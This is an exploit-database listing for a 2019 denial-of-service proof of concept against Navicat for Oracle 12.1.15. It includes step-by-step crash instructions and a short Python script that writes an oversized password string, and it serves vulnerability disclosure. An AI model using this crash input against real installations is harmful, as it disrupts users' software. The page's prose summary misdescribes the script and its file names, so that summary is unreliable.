Navicat for Oracle 12.1.15 - "Password" Denial of Service (PoC)

vendor:

Navicat for Oracle

by:

Victor Mondragón

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Navicat for Oracle

Affected Version From: 12.1.15

Affected Version To: 12.1.15

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Single Language x64, Windows 7 x64 Service Pack 1

2019

Navicat for Oracle 12.1.15 – “Password” Denial of Service (PoC)

This exploit causes a denial of service in Navicat for Oracle 12.1.15 by sending a specially crafted password. The exploit code is written in Python, and it opens a file called code.txt and copies its content to the clipboard. Then, it opens Navicat for Oracle and selects the 'Connection' option, followed by 'Oracle'. It fills in the necessary connection details, including a malicious IP address and a large password. When the user clicks 'Accept', the application crashes.

Mitigation:

There is no known mitigation for this vulnerability. Avoid using Navicat for Oracle 12.1.15 or update to a patched version if available.

Source

Exploit-DB raw data:

#Exploit Title: Navicat for Oracle 12.1.15 - "Password" Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-14
#Vendor Homepage: https://www.navicat.com/es/
#Software Link: https://www.navicat.com/es/download/navicat-for-oracle
#Tested Version: 12.1.15
#Tested on: Windows 10 Single Language x64/ Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: Navicat_for_Oracle_12.1.15.py
#2.- Open code.txt and copy content to clipboard
#2.- Open Navicat for Oracle 12.1.15
#3.- Select "Conexión" 
#4.- Select "Oracle"
#5.- In "Nombre de conexión" type "Test"
#6.- In "Tipo de conexión" select "Basic"
#7.- In "Host" type 1.1.1.1
#8.- In "Puerto" type "1521"
#9.- In "Nombre del servicio" type ORCL
#10.- In "Nombre de usuario" type "user"
#11.- In "Contraseña" Paste Clipboard 
#12.- Select "Aceptar"
#13.- Crashed

cod = "\x41" * 550

f = open('string.txt', 'w')
f.write(cod)
f.close()